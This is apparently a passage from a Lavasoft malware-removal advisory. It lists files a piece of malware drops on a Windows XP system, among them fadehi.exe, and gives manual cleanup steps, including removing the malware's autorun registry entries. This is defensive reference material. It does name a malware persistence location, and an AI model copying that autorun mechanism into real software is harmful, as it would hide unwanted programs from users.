    %System%\WindowsPowerShell\v1.0\SET76.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET73.tmp (1 bytes)
    %System%\GroupPolicy\Adm\SET39.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET6C.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET5A.tmp (3361 bytes)
    %System%\SET2E.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SETD1.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET7D.tmp (17 bytes)
    %System%\SETE.tmp (673 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
    %System%\WindowsPowerShell\v1.0\SETA2.tmp (22 bytes)
    %System%\WindowsPowerShell\v1.0\SET88.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET5E.tmp (49 bytes)
    %System%\wbem\SET23.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SETAE.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
    %System%\SET17.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET64.tmp (7971 bytes)
    %System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
    %System%\SETA.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET93.tmp (5 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
    %System%\WindowsPowerShell\v1.0\SET75.tmp (21 bytes)
    %WinDir%\MedCtrOC.log (8910 bytes)
    %System%\config\SYSTEM.LOG (5705 bytes)
    %System%\SET34.tmp (789 bytes)
    %System%\SET18.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETA7.tmp (2 bytes)
    %System%\SET27.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET72.tmp (1 bytes)
    %System%\SET11.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET63.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET3F.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET4F.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETCE.tmp (1425 bytes)
    %System%\GroupPolicy\Adm\SET3A.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET81.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SET4B.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET89.tmp (11 bytes)
    %System%\SET35.tmp (14 bytes)
    %WinDir%\msgsocm.log (6541 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
    %System%\SETF.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SETD2.tmp (16 bytes)
    %System%\SET10.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC8.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET5F.tmp (40 bytes)
    %System%\SET26.tmp (35 bytes)
    %System%\WindowsPowerShell\v1.0\SET5B.tmp (10 bytes)
    %System%\WindowsPowerShell\v1.0\SETBD.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET69.tmp (8 bytes)
    %System%\config\system (3251 bytes)
    %System%\WindowsPowerShell\v1.0\SET8E.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SETB2.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET49.tmp (57 bytes)
    %System%\WindowsPowerShell\v1.0\SETA1.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET9F.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET4A.tmp (2321 bytes)
    %System%\SET32.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4D.tmp (4 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
    %System%\WindowsPowerShell\v1.0\SETBF.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC9.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETAF.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET91.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET87.tmp (8 bytes)
    %WinDir%\imsins.log (3792 bytes)
    %System%\wbem\SET9.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SET44.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET9D.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SETB6.tmp (7 bytes)
    %System%\SET16.tmp (12 bytes)
    %System%\winrm\0409\SET3C.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET55.tmp (1425 bytes)
    %System%\CatRoot2\dberr.txt (1031 bytes)
    %System%\WindowsPowerShell\v1.0\SET70.tmp (12 bytes)
    %WinDir%\iis6.log (139812 bytes)
    %WinDir%\comsetup.log (49682 bytes)
    %System%\WindowsPowerShell\v1.0\SET94.tmp (19 bytes)
    %System%\spupdsvc.exe (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET5D.tmp (36 bytes)
    %System%\WindowsPowerShell\v1.0\SET95.tmp (61 bytes)
    %System%\WindowsPowerShell\v1.0\SET65.tmp (10 bytes)
    %System%\SET28.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET92.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA4.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET7E.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET45.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SETB4.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SETCF.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET9A.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET6E.tmp (5 bytes)
    %System%\SET31.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET8C.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETAC.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET6F.tmp (23 bytes)
    %System%\GroupPolicy\Adm\SET21.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET53.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC7.tmp (601 bytes)
    %System%\SET29.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SET82.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET9B.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET97.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETB5.tmp (10 bytes)
    %System%\WindowsPowerShell\v1.0\SET7A.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SETCD.tmp (7385 bytes)
    %System%\WindowsPowerShell\v1.0\SETA9.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SETAD.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETD0.tmp (40 bytes)
    %System%\SET2C.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET8B.tmp (4 bytes)
    %WinDir%\KB968930.log (245066 bytes)
    %System%\SET15.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET4C.tmp (18 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETC3.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET61.tmp (13 bytes)
    %WinDir%\inf\oem10.inf (673 bytes)
    %System%\SET24.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SETB1.tmp (10 bytes)
    %System%\SET1C.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET52.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET43.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET96.tmp (12 bytes)
    %WinDir%\FaxSetup.log (53338 bytes)
    %System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
    %WinDir%\tsoc.log (79170 bytes)
    %System%\WindowsPowerShell\v1.0\SET7B.tmp (5 bytes)
    %WinDir%\KB968930xp.cat (59 bytes)
    %System%\WindowsPowerShell\v1.0\SET90.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET71.tmp (11 bytes)
    %System%\SETD.tmp (1281 bytes)
    %WinDir%\netfxocm.log (9089 bytes)
    %System%\SETC.tmp (35 bytes)
    %System%\WindowsPowerShell\v1.0\SET47.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET8A.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET6B.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\SET85.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SETB9.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SETBB.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET79.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET60.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETCB.tmp (601 bytes)
    %WinDir%\ocgen.log (71000 bytes)
    %System%\WindowsPowerShell\v1.0\SET77.tmp (9 bytes)
    %WinDir%\inf\SET37.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET9E.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET40.tmp (24 bytes)
    %WinDir%\inf\SET38.tmp (12 bytes)
    %System%\SET2F.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET62.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET98.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET78.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET5C.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET9C.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET6A.tmp (22 bytes)
    %System%\SET30.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETA8.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SETB8.tmp (5 bytes)
    %WinDir%\tabletoc.log (2313 bytes)
    %System%\WindowsPowerShell\v1.0\SETA3.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET50.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC6.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SETC0.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET42.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETAB.tmp (12 bytes)
    %System%\GroupPolicy\Adm\SET1F.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET83.tmp (6 bytes)
    %System%\GroupPolicy\Adm\SET20.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETBA.tmp (2 bytes)
    %WinDir%\assembly\tmp\3LPSVY14\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\VEHKNRUX\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
    %WinDir%\assembly\tmp\FY147AEH\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
    %WinDir%\assembly\tmp\XFJMPSVY\Microsoft.WSMan.Management.dll (9608 bytes)
    %WinDir%\assembly\tmp\2MPSVY14\System.Management.Automation.dll (81046 bytes)
    %WinDir%\assembly\tmp\RADGKNQT\Microsoft.PowerShell.Editor.dll (32824 bytes)
    %WinDir%\assembly\tmp\CX148BEH\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
    %WinDir%\assembly\tmp\3MPSVY15\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
    %WinDir%\assembly\tmp\XFILORVY\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
    %WinDir%\assembly\tmp\L47ADHKN\Microsoft.WSMan.Management.resources.dll (13 bytes)
    %WinDir%\assembly\tmp\HZ258BEH\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\O7ADGKNQ\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
    %WinDir%\assembly\tmp\VDGJNQTW\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
    %WinDir%\assembly\tmp\K258CFIL\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
    %WinDir%\assembly\tmp\YGKNQTWZ\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
    %WinDir%\assembly\tmp\ATWZ258B\Microsoft.PowerShell.Security.dll (2392 bytes)
    %WinDir%\assembly\tmp\J258CFIL\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
    %WinDir%\assembly\tmp\7QTWZ258\Microsoft.PowerShell.Security.resources.dll (9 bytes)
    %WinDir%\assembly\tmp\0JMPSVY1\Microsoft.WSMan.Runtime.dll (7 bytes)
    %WinDir%\assembly\tmp\RBEHKNRT\System.Management.Automation.resources.dll (9320 bytes)
    %WinDir%\assembly\tmp\WEHKNRUX\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\TBEILORU\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\GY147ADG\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp3.tmp (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (7385 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (68628 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe (1683 bytes)
    %Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb (4108 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QL4XETI5\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "c:\documents and settings\"%CurrentUserName%"\local settings\application data\fadehi\fadehi.exe."

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "c:\documents and settings\"%CurrentUserName%"\local settings\application data\fadehi\fadehi.exe "

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now